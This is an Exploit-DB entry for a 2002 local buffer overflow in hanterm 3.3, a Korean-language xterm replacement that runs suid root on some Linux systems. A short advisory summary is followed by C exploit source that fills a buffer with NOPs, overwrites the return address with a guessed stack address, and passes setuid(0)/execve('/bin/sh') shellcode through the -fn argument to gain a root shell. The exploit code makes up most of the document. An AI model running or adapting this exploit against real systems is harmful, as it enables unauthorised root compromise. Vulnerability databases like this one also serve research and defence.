Hanterm 3.3 - Local Buffer Overflow (2)

EDB-ID:

21281


Author:

xperc

Type:

local


Platform:

Linux

Date:

2002-02-07


// source: https://www.securityfocus.com/bid/4050/info
 
Hanterm is a replacement for xterm which includes Hangul support, used for Korean language systems.
 
A buffer overflow error exists in hanterm. If it is called locally with a maliciously constructed parameter, it is possible to overflow a buffer. This can result in the return address of a stack frame being overwritten, and lead to the execution of arbitrary code.
 
As hanterm runs suid root on some systems, exploitation of this vulnerability may result in a local root compromise. 

/* hanterm_exp.c
 *
 * local exploit for hanterm
 *  .. tested in TurboLinux Server 6.5 (Japan)
 *
 * thanks my Japanese friend kaju(kaijyu)
 * and Japanese hacker UNYUN.
 *
 *                  by xperc@hotmail.com
 *                         2002/02/07
 */

#include <stdio.h>

#define NOP		0x90
#define MAXBUF		88
#define RETOFS		84
#define SHELL_OFS 	22
#define ESP_OFS 	-0xe38

unsigned int get_esp()
{
	__asm__("mov %esp,%eax");
}

int main()
{
        static char shellcode[]={
            0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80,

0x31,0xc0,0x31,0xdb,0xb0,0x2e,0xcd,0x80,
            0xeb,0x18,0x5e,0x89,0x76,0x08,0x31,0xc0,

0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b,
            0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c,
            0xcd,0x80,0xe8,0xe3,0xff,0xff,0xff,0x2f,
            0x62,0x69,0x6e,0x2f,0x73,0x68,0x00
        };
        unsigned int retadr;
	char buf[MAXBUF];
        int i;

	memset(buf,NOP,MAXBUF);

	retadr=get_esp()+ESP_OFS;
	printf("Jumping address = %p\n",retadr);

	for(i=RETOFS-32;i<RETOFS+32;i+=4){
		buf[i]	=retadr&0xff;
		buf[i+1]=(retadr>>8)&0xff;
		buf[i+2]=(retadr>>16)&0xff;
		buf[i+3]=(retadr>>24)&0xff;
	}
	strncpy(buf+SHELL_OFS,shellcode,strlen
(shellcode));
	//buf[MAXBUF-1]='\0';       faint!:-(
	execl("/usr/bin/X11/hanterm","hanterm","-
fn",buf,(char *)0);
}